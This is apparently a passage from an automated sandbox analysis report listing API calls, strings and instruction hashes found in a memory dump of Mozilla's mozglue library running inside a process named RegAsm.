                                                                            • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CC978CF
                                                                              • Part of subcall function 6CC34DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC34E5A
                                                                              • Part of subcall function 6CC34DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC34E97
                                                                              • Part of subcall function 6CC34290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC73EBD,6CC73EBD,00000000), ref: 6CC342A9
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                            • String ID:
                                                                            • API String ID: 2525797420-0
                                                                            • Opcode ID: 028e260e57d0adc0fbf3045243ea68f87063af387e23a36c59fe3969ad9770d5
                                                                            • Instruction ID: 2dd5b361b5c0cff2c2a0cce4a73f8cb83eafe1ecb128bbca8c71ed04cbe70aca
                                                                            • Opcode Fuzzy Hash: 028e260e57d0adc0fbf3045243ea68f87063af387e23a36c59fe3969ad9770d5
                                                                            • Instruction Fuzzy Hash: 3A41AD71905B069FD300DF29D48056AFBF4FFCA254F204A2EE4A987740EB31D559CB92
                                                                            APIs
                                                                            • ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC8DB86
                                                                            • ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6CC8DC0E
                                                                            • free.MOZGLUE(?), ref: 6CC8DC2E
                                                                            • free.MOZGLUE(?), ref: 6CC8DC40
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Impl@detail@mozilla@@Mutexfree
                                                                            • String ID:
                                                                            • API String ID: 3186548839-0
                                                                            • Opcode ID: 6fdd186e3884d1ab83c0a012bda7019ae9325ef52a772a1638255fff18c84ad0
                                                                            • Instruction ID: 2c97abf3ba017b9f81cc225f445f377aa0618614829f0a88ce35b68cef09d54a
                                                                            • Opcode Fuzzy Hash: 6fdd186e3884d1ab83c0a012bda7019ae9325ef52a772a1638255fff18c84ad0
                                                                            • Instruction Fuzzy Hash: 0C4178B56057018FC710CF35C498A6BBBF6BFC8258F55882EE89A87741EB31E845CB51
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6CC782BC,?,?), ref: 6CC7649B
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC764A9
                                                                              • Part of subcall function 6CC6FA80: GetCurrentThreadId.KERNEL32 ref: 6CC6FA8D
                                                                              • Part of subcall function 6CC6FA80: AcquireSRWLockExclusive.KERNEL32(6CCBF448), ref: 6CC6FA99
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC7653F
                                                                            • free.MOZGLUE(?), ref: 6CC7655A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                            • String ID:
                                                                            • API String ID: 3596744550-0
                                                                            • Opcode ID: f36dda54a260d58d2637ece7cc8a21b8859bc92fc86ee8e8daa082981bfa7170
                                                                            • Instruction ID: 49e8e67bf02723a6240f7e2105daf02e09c3a1f18c1526096c8c75df20cbd06a
                                                                            • Opcode Fuzzy Hash: f36dda54a260d58d2637ece7cc8a21b8859bc92fc86ee8e8daa082981bfa7170
                                                                            • Instruction Fuzzy Hash: A3316FB5A047059FD740CF24D884A9ABBF4FF89314F00842EF85A97751EB34E919CB92
                                                                            APIs
                                                                            • free.MOZGLUE(?), ref: 6CC8A315
                                                                            • ?_Xbad_function_call@std@@YAXXZ.MSVCP140(?), ref: 6CC8A31F
                                                                            • free.MOZGLUE(00000000,?,?,?,?), ref: 6CC8A36A
                                                                              • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                              • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                              • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                              • Part of subcall function 6CC82140: free.MOZGLUE(?,00000060,?,6CC87D36,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC8215D
                                                                            • free.MOZGLUE(00000000), ref: 6CC8A37C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$CriticalSection$EnterLeaveXbad_function_call@std@@memset
                                                                            • String ID:
                                                                            • API String ID: 700533648-0
                                                                            • Opcode ID: 2e24a3a0c5ecca89d1e7a8372f58d6433107f9482319796e6496eb482cdf98b4
                                                                            • Instruction ID: 57631d54979c05c70f35e463fce654f5f7083325a63d287472994dc2d1a2f87d
                                                                            • Opcode Fuzzy Hash: 2e24a3a0c5ecca89d1e7a8372f58d6433107f9482319796e6496eb482cdf98b4
                                                                            • Instruction Fuzzy Hash: 5721F2B1A026249BCB118F06D844B9FBBB9EF8672CF544015EE099B740EB36ED06C6D5
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6CC8D019,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?), ref: 6CC6FFD3
                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,6CC8D019,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?,?), ref: 6CC6FFF5
                                                                            • free.MOZGLUE(?,?,?,?,?,6CC8D019,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?), ref: 6CC7001B
                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6CC8D019,?,?,?,?,?,00000000,?,6CC7DA31,00100000,?,?), ref: 6CC7002A
                                                                            Similarity
                                                                            • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                            • String ID:
                                                                            • API String ID: 826125452-0
                                                                            • Opcode ID: 12b27162f1551ef2bc322ff715a8b29709eef8535d2be9cac9cbb668f7ec739c
                                                                            • Instruction ID: bfafa36b646b16de20d7e3550097c6cee77d6c2926f041836281edc0c978bfff
                                                                            • Opcode Fuzzy Hash: 12b27162f1551ef2bc322ff715a8b29709eef8535d2be9cac9cbb668f7ec739c
                                                                            • Instruction Fuzzy Hash: 9D21F4B2A002155FC7189EAD98D48AEB7FAFB853243254738E425D7780FA71AD0286A1
                                                                            APIs
                                                                              • Part of subcall function 6CC4BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6CC97A3F), ref: 6CC4BF11
                                                                              • Part of subcall function 6CC4BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6CC97A3F), ref: 6CC4BF5D
                                                                              • Part of subcall function 6CC4BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6CC97A3F), ref: 6CC4BF7E
                                                                            • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6CC97968
                                                                            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6CC9A264,6CC9A264), ref: 6CC9799A
                                                                              • Part of subcall function 6CC49830: free.MOZGLUE(?,?,?,6CC97ABE), ref: 6CC4985B
                                                                            • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6CC979E0
                                                                            • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6CC979E8
                                                                            Similarity
                                                                            • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                            • String ID:
                                                                            • API String ID: 3421697164-0
                                                                            • Opcode ID: 2355cf0a370bdf432cf809ec85837f114b483b683212884c91689894ccfacba5
                                                                            • Instruction ID: 91ff6c8a2fd40c026cafafc63d6f1410255401fbbd5df6ca6422035774c3ec5d
                                                                            • Opcode Fuzzy Hash: 2355cf0a370bdf432cf809ec85837f114b483b683212884c91689894ccfacba5
                                                                            • Instruction Fuzzy Hash: E3218C357043049FCB04DF68D898A9EBBB5EF89314F00886DE84A87351DB34A90ACB92
                                                                            APIs
                                                                              • Part of subcall function 6CC4BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6CC97A3F), ref: 6CC4BF11
                                                                              • Part of subcall function 6CC4BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6CC97A3F), ref: 6CC4BF5D
                                                                              • Part of subcall function 6CC4BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6CC97A3F), ref: 6CC4BF7E
                                                                            • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6CC97A48
                                                                            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6CC97A7A
                                                                              • Part of subcall function 6CC49830: free.MOZGLUE(?,?,?,6CC97ABE), ref: 6CC4985B
                                                                            • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6CC97AC0
                                                                            • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6CC97AC8
                                                                            Similarity
                                                                            • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
                                                                            • String ID:
                                                                            • API String ID: 3421697164-0
                                                                            • Opcode ID: 041102d017c6538fbfee5a3f3c5cf63d3acda700d1eb9cc78f67ef5fef963f7f
                                                                            • Instruction ID: f388e2d80a83a34411b7b484af4c7ef0e039979175002b9ff7ed32a0d709380c
                                                                            • Opcode Fuzzy Hash: 041102d017c6538fbfee5a3f3c5cf63d3acda700d1eb9cc78f67ef5fef963f7f
                                                                            • Instruction Fuzzy Hash: 2D215C357043049FCB14DF68D899A9EBBB5FF89314F00886DE84A87355DB34A90ACBD2
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC9AAF8
                                                                            • EnterCriticalSection.KERNEL32(6CCBF770,?,6CC5BF9F), ref: 6CC9AB08
                                                                            • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,6CC5BF9F), ref: 6CC9AB39
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF770,?,?,?,?,?,?,?,?,6CC5BF9F), ref: 6CC9AB6B
                                                                            Similarity
                                                                            • API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
                                                                            • String ID:
                                                                            • API String ID: 1951318356-0
                                                                            • Opcode ID: 443c8b6f97209cc22acbae879b50530f6db4af344e926753fb19fd387b25534f
                                                                            • Instruction ID: 8c5b8c1ce7bbe55ae1cf3c8242fd5ca4444ca291a93cebb8d8a4fdd5daf6f020
                                                                            • Opcode Fuzzy Hash: 443c8b6f97209cc22acbae879b50530f6db4af344e926753fb19fd387b25534f
                                                                            • Instruction Fuzzy Hash: 301151B5E002499FCF00DFE9D89899FBBB5FF893047040469E545A7701EB34E909CBA5
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC4B4F5
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC4B502
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC4B542
                                                                            • free.MOZGLUE(?), ref: 6CC4B578
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                            • String ID:
                                                                            • API String ID: 2047719359-0
                                                                            • Opcode ID: 1bcb012eb7aa12904c18088a29dd7ad041d00ef73f955f0d54e8e317fc92304d
                                                                            • Instruction ID: 48c1169dc9ce747b403f9707add61b2856b8b85d96a47c8c9b00becc81d606ce
                                                                            • Opcode Fuzzy Hash: 1bcb012eb7aa12904c18088a29dd7ad041d00ef73f955f0d54e8e317fc92304d
                                                                            • Instruction Fuzzy Hash: 0A11AC38A04B45CBD7128FA9C410769F3B0FF9A318F10D70AE84952B02FBB4B5D48A94
                                                                            APIs
                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6CC3F20E,?), ref: 6CC73DF5
                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6CC3F20E,00000000,?), ref: 6CC73DFC
                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC73E06
                                                                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CC73E0E
                                                                              • Part of subcall function 6CC6CC00: GetCurrentProcess.KERNEL32(?,?,6CC331A7), ref: 6CC6CC0D
                                                                              • Part of subcall function 6CC6CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6CC331A7), ref: 6CC6CC16
                                                                            Similarity
                                                                            • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                            • String ID:
                                                                            • API String ID: 2787204188-0
                                                                            • Opcode ID: f26b9706b7d01ac24e59bcc73bd739ac8161575e4a751243f20feeb98da804e2
                                                                            • Instruction ID: 9d300804ed67bedd48821102e6da071106251510fa49828224085e15a2096ba1
                                                                            • Opcode Fuzzy Hash: f26b9706b7d01ac24e59bcc73bd739ac8161575e4a751243f20feeb98da804e2
                                                                            • Instruction Fuzzy Hash: 66F01275A002087FDB00AB94DC85DAB377DDB46628F040024FD0857741E636BD2586FB
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8205B
                                                                            • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6CC8201B,?,?,?,?,?,?,?,6CC81F8F,?,?), ref: 6CC82064
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8208E
                                                                            • free.MOZGLUE(?,?,?,00000000,?,6CC8201B,?,?,?,?,?,?,?,6CC81F8F,?,?), ref: 6CC820A3
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                            • String ID:
                                                                            • API String ID: 2047719359-0
                                                                            • Opcode ID: 1fd8aa61f2fb3ff2a5a6ef165a275de8574be35f5b55cdd5c98bd3a212b255bd
                                                                            • Instruction ID: a7ba363ecef7fd4b7c1b29ec385ed93362742bc669c7128d3501e902d6065a11
                                                                            • Opcode Fuzzy Hash: 1fd8aa61f2fb3ff2a5a6ef165a275de8574be35f5b55cdd5c98bd3a212b255bd
                                                                            • Instruction Fuzzy Hash: E7F0B4B1201A109BC7118F16D89C75BBBF9EF86328F10012AF50687710DBB5B806CB99
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC820B7
                                                                            • AcquireSRWLockExclusive.KERNEL32(00000000,?,6CC6FBD1), ref: 6CC820C0
                                                                            • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6CC6FBD1), ref: 6CC820DA
                                                                            • free.MOZGLUE(00000000,?,6CC6FBD1), ref: 6CC820F1
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                            • String ID:
                                                                            • API String ID: 2047719359-0
                                                                            • Opcode ID: 7d1174ac2bf61cefeba09c69ac75a7664a074a6926acb5316bd4a1344ea7b325
                                                                            • Instruction ID: 76e149e102248059f2c16f70d5a8d1039b48b1e54a8c2708622b9a547cfe41a2
                                                                            • Opcode Fuzzy Hash: 7d1174ac2bf61cefeba09c69ac75a7664a074a6926acb5316bd4a1344ea7b325
                                                                            • Instruction Fuzzy Hash: 1CE0E5756016148BC6209F65985C54FBBF9FF86318B10022AF446C3B00E775B94686D9
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CC885D3
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CC88725
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                            • String ID: map/set<T> too long
                                                                            • API String ID: 3720097785-1285458680
                                                                            • Opcode ID: a2ee0e7a6e24b434dee6806558f80573ce5ee64091a7b4235445ab55b9e9c6fa
                                                                            • Instruction ID: 2140abc75b77bfd605806b1b4853986fe4d67bedb3431fac5c25acb84d06685e
                                                                            • Opcode Fuzzy Hash: a2ee0e7a6e24b434dee6806558f80573ce5ee64091a7b4235445ab55b9e9c6fa
                                                                            • Instruction Fuzzy Hash: 285164B4602641CFD701CF18C184A5ABBF1BF4A318F18C29AD8595BB66E335E885CF92
                                                                            APIs
                                                                            • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6CC3BDEB
                                                                            • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC3BE8F
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                            • String ID: 0
                                                                            • API String ID: 2811501404-4108050209
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC39B2C
                                                                            • memcpy.VCRUNTIME140(6CC399CF,00000000,?), ref: 6CC39BB6
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC39BF8
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC39DE4
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID:
                                                                            • API String ID: 3510742995-0
                                                                            APIs
                                                                              • Part of subcall function 6CC437F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6CC9145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6CC4380A
                                                                              • Part of subcall function 6CC78DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6CC906E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6CC78DCC
                                                                              • Part of subcall function 6CC80B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6CC8138F,?,?,?), ref: 6CC80B80
                                                                            • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6CC8138F,?,?,?), ref: 6CC80B27
                                                                            • free.MOZGLUE(?,?,?,?,?,6CC8138F,?,?,?), ref: 6CC80B3F
                                                                            Strings
                                                                            • baseprofiler::profiler_capture_backtrace, xrefs: 6CC80AB5
                                                                            Similarity
                                                                            • API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
                                                                            • String ID: baseprofiler::profiler_capture_backtrace
                                                                            • API String ID: 3592261714-147032715
                                                                            APIs
                                                                            • calloc.MOZGLUE(?,?), ref: 6CC3F19B
                                                                              • Part of subcall function 6CC5D850: EnterCriticalSection.KERNEL32(?), ref: 6CC5D904
                                                                              • Part of subcall function 6CC5D850: LeaveCriticalSection.KERNEL32(?), ref: 6CC5D971
                                                                              • Part of subcall function 6CC5D850: memset.VCRUNTIME140(?,00000000,?), ref: 6CC5D97B
                                                                            • mozalloc_abort.MOZGLUE(?), ref: 6CC3F209
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
                                                                            • String ID: d
                                                                            • API String ID: 3775194440-2564639436
                                                                            APIs
                                                                            • malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                              • Part of subcall function 6CC4CAB0: EnterCriticalSection.KERNEL32(?), ref: 6CC4CB49
                                                                              • Part of subcall function 6CC4CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6CC4CBB6
                                                                            • mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeavemallocmozalloc_abort
                                                                            • String ID: d
                                                                            • API String ID: 3517139297-2564639436
                                                                            APIs
                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC73D19
                                                                            • mozalloc_abort.MOZGLUE(?), ref: 6CC73D6C
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: _errnomozalloc_abort
                                                                            • String ID: d
                                                                            • API String ID: 3471241338-2564639436
                                                                            APIs
                                                                            • realloc.MOZGLUE(?,?), ref: 6CC51A6B
                                                                              • Part of subcall function 6CC51AF0: EnterCriticalSection.KERNEL32(?), ref: 6CC51C36
                                                                            • mozalloc_abort.MOZGLUE(?), ref: 6CC51AE7
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CriticalEnterSectionmozalloc_abortrealloc
                                                                            • String ID: d
                                                                            • API String ID: 2670432147-2564639436
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CC444B2,6CCBE21C,6CCBF7F8), ref: 6CC4473E
                                                                            • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CC4474A
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: GetNtLoaderAPI
                                                                            • API String ID: 1646373207-1628273567
                                                                            APIs
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CC96E22
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC96E3F
                                                                            Strings
                                                                            • MOZ_DISABLE_WALKTHESTACK, xrefs: 6CC96E1D
                                                                            Similarity
                                                                            • API ID: Init_thread_footergetenv
                                                                            • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                            • API String ID: 1472356752-1153589363
                                                                            APIs
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC49EEF
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Init_thread_footer
                                                                            • String ID: Infinity$NaN
                                                                            • API String ID: 1385522511-4285296124
                                                                            APIs
                                                                            • SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6CCB51C8), ref: 6CC9591A
                                                                            • CloseHandle.KERNEL32(FFFFFFFF), ref: 6CC9592B
                                                                            Strings
                                                                            • MOZ_SKELETON_UI_RESTARTING, xrefs: 6CC95915
                                                                            Similarity
                                                                            • API ID: CloseEnvironmentHandleVariable
                                                                            • String ID: MOZ_SKELETON_UI_RESTARTING
                                                                            • API String ID: 297244470-335682676
                                                                            APIs
                                                                            • DisableThreadLibraryCalls.KERNEL32(?), ref: 6CC4BEE3
                                                                            • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6CC4BEF5
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Library$CallsDisableLoadThread
                                                                            • String ID: cryptbase.dll
                                                                            • API String ID: 4137859361-1262567842
                                                                            • Opcode ID: d32b1f7f5b01e521b10a2b80484d80bbdc039c1c6f88ec9ea0f730d71fcd3e61
                                                                            • Instruction ID: 011b58f92c8a1e79a370ef0226780a45d1fec940691ca01229a66f85911a1f9a
                                                                            • Opcode Fuzzy Hash: d32b1f7f5b01e521b10a2b80484d80bbdc039c1c6f88ec9ea0f730d71fcd3e61
                                                                            • Instruction Fuzzy Hash: D0D022322C4A48EBCB00ABE08C2AF2D3BB8A712325F10C020F30594CA1E7B0A410CF98
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6CC34E9C,?,?,?,?,?), ref: 6CC3510A
                                                                            • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6CC34E9C,?,?,?,?,?), ref: 6CC35167
                                                                            • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?), ref: 6CC35196
                                                                            • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6CC34E9C), ref: 6CC35234
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID:
                                                                            • API String ID: 3510742995-0
                                                                            • Opcode ID: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                            • Instruction ID: 68aaadce41f194fe15c1618fa8afda310899862de40645545528940ef4927389
                                                                            • Opcode Fuzzy Hash: 933be0c35787ef1d59b8af2b73a0f28f4363cc6c90fe8bc4464883a815d3fd0d
                                                                            • Instruction Fuzzy Hash: 6C919D75505626CFCB14CF08D490A56BBB1FF89318B298688DC599B715E772FC82CBE0
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC70918
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC709A6
                                                                            • EnterCriticalSection.KERNEL32(6CCBE7DC,?,00000000), ref: 6CC709F3
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE7DC), ref: 6CC70ACB
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
